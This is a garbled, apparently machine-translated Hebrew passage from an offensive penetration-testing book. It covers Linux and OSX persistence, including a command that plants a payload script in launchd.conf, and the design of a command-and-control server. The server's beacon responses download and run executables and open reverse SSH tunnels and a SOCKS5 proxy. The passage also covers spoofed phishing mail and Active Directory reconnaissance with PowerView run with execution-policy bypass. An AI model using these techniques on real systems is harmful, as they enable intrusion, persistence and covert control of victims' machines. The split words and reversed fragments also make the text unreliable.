‫פוע לים מ ספר עות קים בזי כרון‪ .‬א חד נו סףייע לם לעתים קרו בות מעיניהם‪.‬‬
‫ראוי להז כיר שרו ב מ ח ברי התו כנה הזדונית אינם מאזנים את היתרונות ש ל התמדה‬
‫לאורך זמן עם ה סי כוי המוג בר לגי לוי‪ .‬ניתו ח מ שפ טי מתמ קד לעתים קרו בות בהתמדה‬
‫כדי למצוא מ טענים‪.‬‬
‫לינו ק ס‬
‫י ש אמונה שהתמדה ב לינו ק ס )וא כן מער כות ‪ UNIX‬בדרך כ ל ל( נו טה להיות מעור בת‬
‫יותר מא שר ‪ -Windows.‬בה סי בה לאמונה ה שגויה הזו היא ש‪*nix -‬הר שאות מ שתמ ש‬
‫נא כפות ) בה שוואה )‪ -Windows‬ל בצורה קפדניתיותר כ ברירת מ חד ל‪ .‬זה לא נדיר‬
‫ש למ שתמ שי ‪Windows‬תהיה גי שה להר בהיותר מהרי שום ממה שהם צרי כים‪ .‬עם זאת‪,‬‬
‫א לא אם המ שתמ ש ש לך פוע ל ‪ -root‬כ)או שאתהי כו ל ל ש כנע אותו להפעי ל את ה קוד‬
‫ש לך ‪ -root),‬כאז ההתמדה תהיה מוג ב לת למ שתמ ש המ בצע ו כתוצאה מ כך להר שאות‬
‫המ שתמ ש‪.‬‬
‫עם זאת‪ ,‬זו לא בעיה מ סי בית;י ש הר בה דר כים לה ס לים את הר שאות המ שתמ ש ברגע‬
‫שאתה מות קן ואתה עדייןי כו ל לע שות הר בה ח קר ר שת כמ שתמ ש צנוע‪ .‬עם זאת‪ ,‬בדרך‬
‫כ ל ל‪ ,‬לא תו כ ל לנ קותיומנים תוך כדי תנועה וזה לא אידיא לי‪ ,‬אם כי רי שום )או ת שומת‬
‫ל ב כ ל שהי ליומנים( הוא פ חות ס ביר ב בניית ת חנת ע בודה‪.‬‬
‫אני דן בה ס למה ש ל הר שאות ב בוא העת‪ ,‬ו באופן כ ל לי‪ ,‬ה שגת גי שה אדמיני ס טר טי בית‬
‫מ קומית במ כונת רא ש ה חוף ש לך תהיה ברא ש סדר העדיפויות בעת בניית מוד ל ‪APT.‬‬
‫י שנה א ס כו לה ש לפיה ל לא הר שאות שור ש‪,‬י ש להימנע מהתמדה מ כיוון שהיא לא מ ספי ק‬
‫חמ קנית‪.‬‬
‫קיימות שי טות הפע לה שונות הזמינות במער כות הפע לה מ בו ס סות לינו ק ס‪.‬‬
‫כפי ש כ בר נאמר‪ ,‬ח ל קם דור שים הר שאות ג בוהות ו ח ל קם לא‪.‬‬
‫שירותים‬
‫ב לינו ק ס‪ ,‬קיימות ש לו ש דר כים להת קין ו להפעי ליי שומים‬

‫ב לינו ק ס‪,‬י ש ש לו ש דר כים להת קין ו להפעי ליי שומים כתה לי כי ר קע )או דמונים(‪ .‬היתרון‬
‫ב שימו ש ב שירותים הוא שמער כת ההפע לה תפעי ל מ חד ש את התה ליך ש לך אם הואימות‪.‬‬
‫א לו הם‪:‬‬
‫מער כת ‪V init‬‬
‫‪Upstart systemd‬‬
‫מער כת ‪V‬או ‪ init‬ק לא סית נת ק לים לעתים ר חו קות כיום‪ ,‬והיא מעניינת ר ק בהפצותי שנות‬
‫יותר ש ל לינו ק ס כגון‪:‬‬
‫‪ Debian 6‬ומע לה או בונ טו ‪ 9.04‬ומו קדמותיותר ‪ CentOS 5‬ומע לה‬
‫תצ טרך ליצור ס קריפ ט פונ קציונ לי ש ל ‪ Bash init‬ב כתו בת ‪etcinit.d/service.‬‬
‫דוגמאות ש ל ס קריפ טים קיימים ניתן למצוא ב ספרייה ‪etcinit.d .‬‬
‫לא חר מ כן הפע ל‪:‬‬
‫הפע לת שירות ‪sudo update-rc.d‬‬
‫פעו לה זו תיצור קי שור סימו ל ב ספריות הריצה ‪ 2‬עד ‪ 5.‬כעת ע ליך להו סיף את פ קודת‬
‫‪respawn‬ה באה ב‪etcinittab: -‬‬
‫‪id:2345:respawn:binsh pathto/application/startup‬‬
‫לא חר מ כן עצור והת ח ל את ה שירות‪:‬‬
‫שירות ‪service sudo service start‬‬

‫‪sudo stop‬‬
‫‪Upstart‬היא שי טת ‪init‬נו ספת ‪ ,‬והוצגה באו בונ טו ‪6.‬היא הפ כה ל ברירת המ חד ל‬

‫באו בונ טו ‪ 9.10,‬ומאו חריותר אומצה לתוך ‪ Red Hat Enterprise 6‬ונגזרותיו‪ .‬מער כת‬
‫ההפע לה ש ל ‪ Google Chrome‬מ שתמ שת גם ‪ -Upstart.‬ב‬
‫או בונ טו ‪ 9.10‬עד או בונ טו ‪ 14.10,‬כו ל ל או בונ טו ‪14.04 CentOS 6‬‬
‫למרות שעדיין נראה לעתים קרו בות‪ ,‬זה בדרך כ ל ל מופ ס ק ל טו בת ‪ systemd,‬שע ליו‬
‫נ סת כ ל בהמ שך‪.‬‬
‫כדי לפעו ל כ שירות‪ ,‬המ טען ש לךיצ טרך ס קריפ ט תצורה ב‪ etcinit -‬ב שם‬
‫‪ servicename.conf.‬שו ב‪ ,‬אתהי כו ל ב ק לות לעצ ב את ה ס קריפ ט ש לך באמצעות קו בץ‬
‫תצורה קיים‪ .‬עם זאת‪ ,‬ודא שה‪ service.conf -‬ש לך מ כי ל את ה שורות ה באות‪:‬‬
‫הת ח ל ברמת ריצה ]‪<rb>[5432‬הת ח ל מ חד ש‬
‫זה מ ב טי ח שה קודיפע ל באת חו ל ויופיע מ חד ש אם הואימות‪systemd .‬הוא מנה ל מער כת‬

‫ו שירות ע בור לינו ק ס שהפך לדמון האת חו ל דה פ ק טו ע בור רו ב ההפצות ה חד שות ש ל לינו ק ס‪.‬‬
‫‪systemd‬תואם לא חור עם פ קודות ‪ System V‬ות סרי טי את חו ל‪.‬‬
‫ודא ש ל שירותי ש ס קריפ ט פונ קציונ לי ‪systemd init‬הממו קם ב‬
‫‪etcsystemd/system/multi-user.target.wants/service.service‬‬
‫הת ח ל את ה שירות‪:‬‬
‫‪sudo systemctl‬אפ שר ‪service.service‬‬
‫ה קו בץ ‪etcsystemd/system/multi-user.target.wants/service.service‬צריך‬
‫לה כי ל גם שורה כמו‬
‫הפע ל מ חד ש=תמיד‬
‫ב ק טע ] שירות[ ש ל ה קו בץ כדי לאפ שר ל שירות להופיע מ חד ש לא חר א‬

‫‪crashs/service.service.‬‬
‫קרון‬
‫‪Cron‬הוא כ לי עזר המ שמ ש להפע לת תה לי כים בזמנים ספציפיים‪ ,‬בדומה ‪ -Windows.‬ב‬

‫‪ -Task Scheduler‬לזה שימו שי ע בור סימוני תזמון מור כ בים וניתן לה שתמ ש בו מ שתמ שים‬
‫ל לא גי שת שור ש לתזמון מ שימות‪.‬‬
‫‪Init Files‬‬
‫עם ה כני סה‪ ,‬כ ל הפגזים התואמים ‪ -Bourne‬ל מ קורו ‪etcprofile,‬א שר בתורו ממ קור כ ל ק בצי‬
‫‪ *.sh‬קריא ב‪ etcprofile.d/. -‬ס קריפ טים א לה אינם דור שים הנ חיית מתורגמן‪ ,‬ואינם צרי כים‬
‫להיות ניתנים להפע לה‪ .‬הם מ שמ שים להגדרת ס בי בה ו להגדרת הגדרות ספציפיות ליי שום‪.‬‬
‫ס בי בות גרפיותי שנם שו ל חנות ע בודה ומנה לי ח לונות שונים ב לינו ק ס‪ ,‬ש בהם ‪-Gnome‬ו ‪KDE‬‬
‫עדיין הפופו לריים ביותר‪ .‬ל כ ל ה ס בי בות ה ל לוי ש דר כים אינדי בידוא ליות מ ש להן להת חי ל קוד‬
‫כ שהן מופע לות‪ ,‬שהן ר בות מ כדי לפר ט כאן‪.‬‬
‫ער כות שור ש‬

‫ההגדרה ש ל ‪ rootkit‬מ שתנה‪ ,‬אך היא בדרך כ ל ל בינארית במער כת היעד שהו ח לפה‬
‫ב קוד זדוני אך שומרת ע ל הפונ קציונ ליות ש ל המ קור‪ .‬בע בר‪ ,‬שירותים פ שו טים מ סוימים‬
‫) כגון אצ בע( היו מ שתנים כך שי כי לו קוד שיעני ק לתו קף גי שה כא שר התממ ש ק איתו‬
‫בצורה ספציפית‪ .‬מ כיוון שמער כות הפע לה מ בו ס סות לינו ק ס הן קוד פתו ח‪ ,‬האפ שרויות‬
‫להת קפות כא לה מוג ב לות ר ק ע לידי הדמיון ש לך‪ ,‬אם כי מת קפה זו נופ לתיותר ל ק טגוריה‬
‫ש ל ד לת א חורית ו לא התמדהי שרה‪.‬‬
‫‪OSX‬‬
‫‪Apple OSX‬היא ל לא ספ ק הפ ל טפורמה המאו ב ט חת ביותר כאן‪ .‬בה שא לה ממער כת‬
‫ההפע לה ‪ iOS‬ש לה‪ ,‬היא בוד קת כעת את כ ל ה חתימות ה בינאריות‪ ,‬כ לומר זה הופך להיות‬
‫ב לתי אפ שרי לערער תה לי כים קיימים ומונע הת קפות כגון הע ברת תה לי כים‪ .‬עם זאת‪,‬‬
‫בניגוד ‪ -iOS,‬לאפ לי קציות לא חתומות מור שות לפעו ל ב חופ שיות‪.‬‬
‫ניתן לה שיג התמדה באמצעות ע בודות ‪ cron‬כמו עם לינו ק ס‪ ,‬א ב לי ש דר כים טו בותיותר‪.‬‬
‫האפ לי קציה הרא שונה במצ ב מ שתמ ש לאת חו ל ‪ -OSX‬ב מופע לת‪ .‬ניתן לנצ ל אותו לרעה‬
‫כדי לה שיג התמדה באופן ה בא‪:‬‬
‫‪# echo bsexec 1 binbash payload.script > etclaunchd.conf‬‬
‫שי טה שהוצאה מ שימו ש ) שעדיין עו בדת( מ שתמ שת בפרי טי הפע לה‪.‬‬

‫ע ליך למ קם שני ק בצים ב ספריית פרי טי הפע לה‪ .‬הרא שון הוא ה ס קריפ ט שאמור להת בצע‬
‫או טומ טית‪ .‬ה קו בץ ה שני חיי ב ל ק ב ל את ה שם ‪ StartupParameters.plist‬ו חיי ב לה כי ל‬
‫מפת ח ‪Provides‬המ כי ל את שם קו בץ ה ס קריפ ט‪.‬י ש למ קם את שני ה ק בצים ה ל לו‬
‫ב ספריית מ שנה ב ספריית ‪SystemLibrary/StartupItems‬או ‪LibraryStartupItems .‬‬
‫ה שם ש ל ספריית המ שנה חיי ב להיות זהה ל שם ש ל קו בץ ה ס קריפ ט )והערך ש ל המפת ח‬

‫‪ Provides‬ב‪StartupParameters.plist). -‬‬
‫פי קוד ו ב קרה ח ל ק ‪2:‬הת קפה מת קדמת‬

‫הַנהָ לָ ה‬
‫ת שתית ‪C2‬המתוארת בפר ק ‪1‬אינה מתאימה ל שום ד בר מ ל בד המ ח שת מו שגים‪.‬‬
‫היעדר ערוץ ניהו ל ת קין מ חוץ לרצועה והי כו לת ל טפ ל ר ק במאר חיעד א חד ב כ ל פעם‬
‫הם מג ב לות ק שות ומ שת קות‪ .‬חי בור ה‪ HSS-‬התמידי גם הוא לא א לגנ טי ו ח סר התגנ בות‪.‬‬
‫הו ספת התגנ בות וניהו ל מער כות מרו בות ב ח ל ק זה‪ ,‬תו סיף פונ קציונ ליות חד שה ני כרת‬
‫כדי להפוך את ה‪ 2C-‬ש לך ל חמ קן‪ ,‬ח כםיותר ו ק ליותר לניהו ל‪ .‬מה שצריך לעת עתה‬
‫הוא הד ברים ה באים‪:‬‬
‫‪ Beaconing -‬כא שר המ טען נמ סר ומות קן‪ ,‬ע ליו להת ק שר מעת לעת ה ביתה‬
‫) שרת ה‪ 2C-‬ש לך( ע בור הזמנות במ קום ליצור מיד חי בור ‪ SSH‬ומנהרה הפו כה‪.‬‬
‫ער כת פ קודות מוגדרת מרא ש ‪ -‬ק בוצה מ בו ס סת ש ל הוראות שניתן להע ביר למ טען‬
‫לצורך ביצוע מ שימות כא שר הוא מת ק שר ה ביתה‪.‬‬
‫ניהו ל מנהרות ‪ -‬שרת ‪C2‬צריך להיות מ סוג ל להתמודד עם מ ספר חי בורים נ כנ סים‬
‫בו‪-‬זמנית ממ טענים ע ל מאר חים שונים ו להיות מ סוג ל ל בצע מנהרות הפו כות‬
‫במ ספריציאות תוך מע ק ב א חר איזו מנהרה שיי כת לאיזויציאה‪.‬‬
‫חזית מ בו ס סת אינ טרנ ט ‪-‬הפונ קציונ ליות הנו ספת ש לך תדרו ש ממ ש ק קוהרנ טי‬
‫לניהו ל הת קפות א ס טר טגי ו ט ק טי כא חד‪.‬‬
‫לדוגמה‪ ,‬ההגדרה ה חד שה ש לך ממ חי שה את המע בר למוד ל מ שואות‪ ,‬כפי שמוצג באיור‬
‫‪2.3.‬‬
‫איור ‪2.3:‬המ סגרת המ שודרגת מ טפ לת במ ספר מאר חים ומער כות הפע לה‪.‬‬
‫ה בה נ ב חן מהיידר ש ליי שום זה‪.‬‬

‫מגד לור הוא פ שו ט ח בי לת )‪HTTP(S‬הנו שאת נתוני ‪XML.‬נתונים א לה מ כי לים מידע‬
‫ע ל המאר ח ש לך ונראים כך‪:‬‬
‫>מגד לור<‬
‫>‪<HostName> </HostName‬‬
‫>‪<InternalIP> </InternalIP‬‬
‫>‪<ExternalIP> </ExternalIP‬‬
‫>‪<CurrentUser> </CurrentUser‬‬
‫>‪<OS></OS‬‬
‫>‪<Admin></Admin‬‬
‫>‪</Beacon‬‬
‫זה פ שו ט וניתן להר ח בה ב ק לות‪ .‬המ שואה מוע ברת ע לידי המ טען לפי מרוו ח מוגדר‬
‫מרא ש‪ .‬ברירת המ חד ל היא ‪ 60‬שניות‪ ,‬אך ניתן ל שנות זאת כא שר המ טען עו לה לאוויר‪.‬‬
‫להת קפה נמו כה ואי טית‪ ,‬ניתן להגדיר מרוו חים ארו כיםיותר‪ ,‬ו למע שה להרדים את‬
‫המ טען לת קופות ממו ש כות‬
‫ניתן להגדיר מרוו חים‪ ,‬ו למע שה להרדים את המ טען לפר קי זמן ממו ש כים במידה ויידר ש‬
‫התגנ בות נו ספת כזו‪ .‬ח בי לת ‪ XML‬מאו כ ל סת תיראה כך‪:‬‬
‫>מגד לור<‬
‫>‪</CurrentUser> </OS> Windows <7 Admin> N </Admin‬‬
‫‪209.58.22.22 </ExternalIP> <CurrentUser> DaveR‬‬
‫>‪<InternalIP> 192.168.17.23 </InternalIP> <ExternalIP‬‬
‫>‪<HostName> WS-office-23 </HostName‬‬
‫>‪</Beacon‬‬
‫התגו בה ל ח בי לה זו כ לו לה גם ‪ -XML:‬ב‬
‫>‪<BeaconResponse‬‬
‫>‪<Command1> </Command1‬‬
‫>‪<Command1Param> </Command1Param‬‬
‫>‪</BeaconResponse‬‬
‫ניתן לערום פ קודות בממ ש ק האינ טרנ ט ל לא הג ב לת זמן ו כו לןי בוצעו כא שר‬
‫המ טעןית ק שר ה ביתה לא חר ת קופת ה שינה שהוגדרה לו‪.‬‬
‫יי שום מ בנה פי קוד‬

‫הפ קודות ש ברצונך ליי שם ב ש ל ב זה הן‪ :‬שינה ‪ -‬שנה את המרוו ח ש בו המ טען קורא‬
‫ה ביתה‪ .‬ברירת המ חד ל היא ‪ 60‬שניות‪ .‬הפרמ טר ל כך הוא המרוו ח ב שניות‪.‬‬
‫‪OpenSSHTunnel -‬זהייצור חי בור ‪ SSH‬ב חזרה ל שרת ‪C2,‬ית חי ל שרת ‪ SSH‬מ קומי וית חי ל מנהרה‬
‫הפו כה שתאפ שר ל‪ 2C-‬לג שת למער כת ה ק בצים ש ל היעד‪ .‬הפרמ טר הוא היציאה המ קומית )יעד( וא חריה‬
‫היציאה ב‪ 2C-‬שא ליוי ש להע ביר בפורמ ט ‪LxxxCxxx.‬‬
‫ל כן הפרמ טר הוא היציאה ב‪ 2C-‬שהמנהרה תהיה נגי שה בה ויציאה מ קומית‬

‫להפע לת שרת ‪ SSH‬ב‪L22C900. :‬‬
‫סגור ‪SSHTunnel -‬אם מנהרת ‪ SSH‬ו שרת פוע לים‪ ,‬הםיהיו‬
‫עצר‪ .‬אין צורך להע ביר וי כו חים‪.‬‬

‫‪OpenTCPTunnel -‬זהייצור חי בור ‪ SSH‬ב חזרה ל שרת ‪ C2‬ותפת ח מנהרה הפו כה ל כ ליציאה ביעד‬
‫לגי שה ל שירותים מ קומיים‪ .‬הפרמ טר הוא היציאה המ קומית )היעד( שא חריה היציאה ב‪ 2C-‬שא ליו‬
‫ניתן להע ביר בפורמ ט ‪ LxxxCxxx.‬לדוגמה‪ ,‬כדי להע ביר ל שרת ‪ FTP‬מ קומי ו להפוך אותו לזמין ביציאה‬
‫‪99,‬אתה מ שתמ ש ב‪L21C99. -‬‬
‫—‪CloseTCPTunnel‬זה ברור‪ .‬הפרמ טר הוא היציאה המ קומית )היעד(‪.‬‬

‫‪ OpenDynamic -‬פעו לה זו תיצור חי בור ‪ SSH‬ב חזרה ל שרת ‪ C2‬ותפת ח גם מנהרה דינמית וגם‬
‫מנהרת ‪TCP‬הפו כה המצ ביעה ע ליה‪ .‬זה הופך למע שה את היעד ש לך ל שרת פרו ק סי ‪ SOCKS5‬וזו‬
‫דרך מצוינת להע ביר את ההת קפה ש לך א ל ר שת היעד ש לך‪ .‬הפרמ טר הוא ‪OpenTCPTunnel.‬‬
‫‪ CloseDynamic -‬שו ב זה ברור‪ .‬הפרמ טר הוא היציאה המ קומית )היעד(‪.‬‬
‫מ שימה ‪-‬הורד קו בץ הפע לה מהאינ טרנ ט והפע ל אותו‪ .‬הפרמ טר הוא כתו בת‬
‫האתר ל קו בץ‪.‬‬
‫כדוגמה‪ ,‬ה ח בי לה ה באה תוריד ות בצע ‪ EXE‬מהאינ טרנ ט‪ ,‬תתג לג ל לר שת היעד‬

‫באמצעות פרו ק סי ‪ SOCKS5‬ותפעי ל שרת ‪ SSH‬ביציאה ‪22,‬הפוך ב חזרה ל‪ 2C-‬ביציאה‬
‫‪900.‬‬
‫>‪ <BeaconResponse> <Command1‬מ שימה >‪</Command3Param> </BeaconResponse‬‬
‫‪<Command3> OpenSSHTunnel</Command3> <Command3Param> L22C900‬‬
‫>‪OpenDynamic </Command2> <Command2Param > L1080C1080 </Command2Param‬‬
‫>‪the.earth.li/~sgtatham/putty/latest/x86/putty.exe </Command1Param> <Command2‬‬
‫‪</Command1> <Command1Param> http://‬‬
‫ע בור ממ ש ק האינ טרנ ט וה קצה הא חורי‪ ,‬אתה צריך מ שהו כדי לע בד את ‪-XML,‬ה‬
‫לא ח סן נתוני ת קיפה נו כ חיים ו להמ חי ש כראוי את המ שימה‪.‬י ש כ ל כך הר בה ט כנו לוגיות‬
‫זמינות כדי לה שיג זאת‪ ,‬אז ההמ לצה ה טו בה ביותר היא ל ל כת עם מה שנו ח לך איתו‪.‬‬
‫עם זאת‪ ,‬ל כ ל שפות ה ס קריפ ט הגונותי ש ספריות המאפ שרות לך ליצוריי שום אינ טרנ ט‬
‫פ שו ט כמו זה במהירות ו ב ק לות‪.‬‬
‫בניית ממ ש ק ניהו ל‬
‫בניית ממ ש ק ניהו ל‬
‫ההעדפה ש לי היא לה שתמ ש בד ברים ה באים‪ ,‬א ב ל זה נו לד מתוך הרג ל ו לא מתוך‬
‫תמי כה אי שית‪:‬‬
‫שרת אינ טרנ ט ‪-‬אני אוה ב ‪tinyhttpd.‬זה קוד פתו ח וי ש לו ט ביעת רג ל ק טנה‬
‫מאוד ש ל פרי סה‪.‬‬
‫שפת ס קריפ טים ‪- Python‬היא ה ב חירה ש לי אם כי בה ח ל טי ש דר כים ק לותיותר‬
‫ל טפ ל במ שימות ה ק שורות לאינ טרנ ט ברו בי‪.‬‬
‫מ סד נתונים ‪-‬אני מעדיף ‪ PostgreSQL.‬פעם הייתי אומר ‪MySQL,‬א ב ל כ בר‬
‫לא‪ .‬אני לא רוצה להי כנ ס להת להמות בנו שא‪ ,‬א ב ל אור ק ל פ שו ט הר סהיותר מדי‬
‫ד ברים שאה בתי‪.‬‬
‫בא שר לממ ש ק מ שתמ ש‪ ,‬אני אוה ב ל שמור ע ל ד ברים פ שו טים‪ ,‬אך ז כור כי תצ טרך‬
‫את הד ברים ה באים‪:‬‬
‫דרך לע קו ב א חר מאר חים כ שהם מ קרינים בזמן אמת‪ .‬מ סגרת זו בממ ש ק צרי כה‬
‫לה שתמ ש בפונ קציונ ליות ש ל ‪AJAX‬או שווה ערך‪ ,‬כך ש כא שר האפ לי קציה‬
‫מ ק ב לת מ שואה חד שה‪ ,‬היא תהיה ג לויה מיד ומו כנה ל ביצוע מ שימות‪ .‬כ ל מאר ח‬
‫צריך להציג את הפעם הא חרונה ב שניות ש בה הוא קי ב ל מ שואה‪.‬‬
‫כ ל מאר ח צריך להציג את כ ל המידע שהת ק ב ל מ ח בי לת המ שואות‪ ,‬כגון‬

‫כתו בות ‪ IP,‬שמות מאר ח ו כו' ‪.‬‬
‫ליד כ ל מאר ח תרצה לע קו ב אי לויציאות פתו חות כעת ו לאי לו מאר חים הם מו קצים‪.‬‬
‫כ ל המידע הזה צריך להיות מ טופ ל ע לידי אפ לי קציית האינ טרנ ט ‪ -‬לא רצוי‬
‫שהיי שום האינ טרנ ט ו שרת ‪C2 SSH‬ית ק שרו ביניהם‪.‬‬
‫יית כן שתרצה ל כתו ב פונ קציה כדי ל בדו ק מעת לעת את מצ ב המנהרות הפתו חות‬
‫ו ל סמן כ ל מה שמתו‪.‬‬
‫תצ טרך להיות דרך לערום פ קודות ע בור כ ל מאר ח ו לתעד אי לו פ קודות בוצעו‪.‬‬
‫זה ב לתי נמנע ש כא שר אתה עו בד ע ל ה טמעת ת שתית ‪ C2‬ש לך‪ ,‬תרצה לע שות ד ברים‬
‫א חרת ו למצוא דר כיםיצירתיותיותר לפתרון בעיות‪.‬י ש לעודד זאת‪.‬‬
‫ההת קפה‬
‫ב ש ל ב זהי ש לך מ טען ת קף‪ ,‬תירוץ ומנגנון מ סירה‪.‬‬
‫כעת תו כ ל ל ש לו ח בדואר המוני את ההזמנה ש לך ליעדים באמצעות דוא" ל מזויף‬
‫כעת תו כ ל ל ש לו ח בדואר המוני את ההזמנה ש לך ליעדים באמצעות אי שורי‬

‫דוא" ל מזויפים‪.‬‬
‫שימו ש ב ספ ק דוא" ל ע ס קי‬
‫יצירת ס קריפ ט ‪ SMTP‬ל טיפו ל במ ש לו ח היא טריוויא לית‪ ,‬אךיית כן שתרצה לה שתמ ש‬
‫ב ספ ק דוא" ל ע ס קה כדי ל טפ ל במ ש לו ח בפוע ל‪.‬י ש הר בה ל ב חירה‪ .‬ה סי בות ל כך הן‬
‫ש בג ל ל דואר ז ב ל‪,‬יית כן ש שרת הדואר המ ק ב ל לא בו ט ח כראוי ב כתו בת ה‪ PI-‬ש לך‬
‫למ ש לו ח דואר‪.‬י שנם מ ספר ספ קים ב חוץ‪ ,‬ורו בםיאפ שרו לך ליצור ח ש בון ני סיון‬
‫הנמ שך חוד ש או כמות מ סוימת ש ל מיי לים ) בדרך כ ל ל בא לפים נמו כים‪ ,‬אז מו ש לם‬
‫לצר כים ש לנו(‪ .‬לרו בםי ש אפ שרות לה טמיע באגי אינ טרנ ט בדואר כדי שתו כ לו‬
‫לראות מתי הם נפת חו‪ .‬ודא ש לעו לם לא ת שתמ ש באותם כתו בות ‪ IP‬למ ש לו ח דואר‬
‫ו‪ .2C-‬זהיהיה ח ב ל שת שתית הפי קוד וה ב קרה ש לך תי ח סם ע לידי כ ל לי אנ טי ספאם‪.‬‬
‫ב כ ל מ קרה‪ ,‬נני ח ש‪:‬‬

‫תירוץ הדוא" ל ש לך נ ש ל ח א ל היעדים‪.‬‬
‫ח ל קם בי קרו באתר ש לך‪.‬‬
‫א חד אויותריפעי לו אתיי שומון ‪-Java‬ה ש לנו ו כעת הם ק שורים לת שתית ‪C2‬‬
‫ש לך‪.‬‬
‫המ טען ש לך מתמ שך‪.‬‬
‫מודעות למצ ב‬
‫המ שימה הרא שונה וה ח שו בה ביותר היא ל ברר הי כן בדיו ק אתה נמצא בר שת ש ליעד‬
‫ומה ההר שאות שי ש לך‪ .‬לא חר מ כן תו כ ל להת חי ל למפות את הר שת‪ ,‬הנ כ סים ש לה‬
‫והמ שתמ שים ש לה‪ ,‬ותו כ ל לה בין הי כן אתה צריך להיות בי ח ס למ קום ש בו אתה נמצא‪.‬‬
‫אַזהָ ָרה‬
‫הימנע מהפרת ה חו ק ב שוגג‪.‬‬
‫שים ל ב ש לפ חותיעד א חד צפה באתר ש לך מהמ ח ש ב ה ביתי ש לו וזה נגוע כעת במ טען‬
‫ש לך‪ .‬בדרך כ ל ל ניתן ל ק בוע זאת במהירות ע לידי כתו בת ה‪ PI-‬הפנימית וה חיצונית‪ .‬זה‬
‫לא אומר שהם‬
‫מת ברר ע לידי כתו בת ה‪ PI-‬הפנימית וה חיצונית‪ .‬זה לא אומר שצריך להוזי ל אותם ל ח לו טין‪ ,‬מ כיוון שיית כן‬
‫שי ש להם קי שוריות ‪VPN‬או נתונים א חרים ה ק שורים לע בודה; עם זאת‪ ,‬אתה תהיה באזור אפור מ שפ טי‬
‫במ קרה זה‪ .‬אני אוה ב לה ש לים מ שימה מוצ ל חת א ב ל אני גם מאוד אוה ב לא להיות ב כ לא‪.‬‬
‫במ קרה זהי שנה חדירה מוצ ל חת ש ל המ ח ל קה למדעי ה ח ברה‪.‬‬
‫אנו מוודאים זאת ע לידי שאי לתה ב‪ Active Directory -‬והורדת ר שימת המאר חים כו לה‪ .‬זה לאיהיה ש לם‬
‫וי כי ל ר ק מ כונות ‪ Windows‬מ שנת ‪ 2000‬ואי לך‪ ,‬א ב ל זה די והותר כדי ל בנות ר שימתיעדים ו לה בין מי‬
‫נמצא איפה‪.‬‬
‫שימו ש ב‪ DA-‬לאי סוף מודיעין‬

‫איך מ שיגים את זה? ו ב כן‪ ,‬פעם הייתי נותן לך ר שימה ש ל פ קודות ר שת מייגעות ש ל ‪ Windows‬לה ק ליד‪.‬‬
‫עם זאת‪ ,‬למר בה המז לי ש דר כים טו בותיותר ומהירותיותר‪ .‬הו סף את הד ברים ה באים ל כ לים ש לך‪:‬‬
‫‪https://github.com/PowerShellEmpire/PowerTools‬‬
‫זהו "או סף ש ל פרוי ק טים ש ל ‪ PowerShell‬עם התמ קדות בפעו לות הת קפיות" וזה שינה ל ח לו טין את‬
‫הדרך ש בה אני ניג ש למודעות מצ בית במה לך מוד לים ש ל ‪ APT‬ו בדי קות חדירה פנימיות‪ .‬זה ח ל ק‬
‫מהפרוי ק ט ה כו ל ל ש ל ‪ Veil‬ו חו בה‪ .‬א חד ה כ לים‪PowerView, ,‬י כו ל ל שמ ש ל שאי לתה ש ל ה‪ DA-‬במ ספר‬
‫דר כים‪ .‬נ שתמ ש בו כדי לתפו ס את כ ל המאר חים בדומיין הפנימי‪:‬‬
‫‪ c:> powershell.exe -nop -exec‬עו קף >‪PS c:‬יי בוא‪-‬מודו ל ‪-FullData | Out-File -.‬‬
‫‪ \powerview.ps1 PS c:> Get-NetComputer‬קידוד ‪ascii machines.txt‬‬
‫זה נותן לך מידע מ שמעותי ע ל כ ל מ כונה ב‪ .DA-‬כדוגמה‪ ,‬ח ל ק מהמידע הר לוונ טי שנ שמר ע בור כ ל מאר ח‬
‫מוצג כאן‪:‬‬
‫‪:‬‬ ‫ח בר ב‬
‫‪CN=GL_APP_VisioPro2010,OU=Applications,OU=Secur ityGroups,OU=coll-domain,DC=uk,DC=coll‬‬
‫ת חום‪D ,‬‬
‫‪=C‬מ קומי‪21-2-2016 21:43:09 :‬‬
‫‪pwdlastset‬‬
‫ה לוגון הא חרון‬ ‫‪: 24-2-2016 22:24:50‬‬

: 21-2-2016 21:17:33
adspath ‫כא שר שונה‬
: LDAP://CN=SOCSCI12-
O,‫=מ ח ש בים‬UO,‫=תמי כה‬UO,7SW
U=coll-domain,DC=uk,DC=coll-domain,DC=local
lastlogontimestamp : 21-2-2016 22:17:18
‫ׁ ֵשם‬ : SOCSCI12-WS7
: 1-1-1601 1:00:00
lastlogoff whencreated distinguishedname
: 15-12-2014 9:15:47
: CN=SOCSCI12-
‫=מא ב ט ח‬UO,‫=מ ח ש בים‬UO,‫=תמי כה‬UO,7SW
eLinkuk,DC=uk,DC=coll-domain,DC=local
‫מער כת הפע לה‬ :0
badpwdcount : Windows 7 Professional
AD ‫ניתו ח פ ל ט‬
‫ הפוע לת‬,‫ אתהי כו ל ל ק בוע את מו ס כמות שמות המאר ח‬,‫מתוך פ ל ט זה‬
‫ ר ק ל חזור‬PowerView -‫ אתהי כו ל ל ב ק ש מ‬.‫ ומידע מועי ל א חר‬,‫מער כת‬
‫ א ב ל זהיצור הר בה תנועה‬,‫שמות מאר חים ואפי לו פינג אי לו מאר חים פוע לים‬
:‫ עיון בפ ל ט‬.‫שאתה רוצה להימנע ממנו‬
samaccountname : medlab04-WS12$
: LDAP://CN=medlab04-
adspath
RlacideM=UO,‫=מ ח ש בים‬UO,21SW
,‫חיפו ש‬
lastlogontimestamp : 21-2-2016 18:54:24
‫ׁ ֵשם‬ : medlab04-WS12
: CN=medlab04-
‫שם מ כו בד‬
‫=מ ח ש בים‬UO,hcraeseRlacideM=UO,21SW
cn : medlab04-WS12
: Windows
‫מער כת הפע לה‬ 7 Professional
:‫ לאתה מ ק ב ל‬-medlab04-WS12, ‫אם אתה פינג‬
:‫ בתים ש ל נתונים‬32 ‫ עם‬pinging medlab04-WS12 [10.10.200.247]

10.10.200.247: bytes=32 time<1ms TTL=126 ‫ת שו בה מתאריך‬
‫המאר ח ש לך קם וזה ני חו ש די טו ב ש כ ל המ ח קר הרפואי‬

‫ מ סת כ ל ע ל כ ל המ כונות המ שתמ שות‬.‫מ כונותיהיו באותה ר שת מ שנה‬
AD: ‫ שא ליה מתיי ח סים בפ ל ט‬Medlab ‫מו ס כמות ה שמות ש ל‬
‫‪medlab03-FTP‬‬
‫‪medlab03-SQL‬‬
‫‪medlab03-WS16‬‬
‫אתהי כו ל לראות שהם כ לו לים ב ‪-10.10.200.0/24.‬זה נראה כאי לו כו לן ת חנות‬

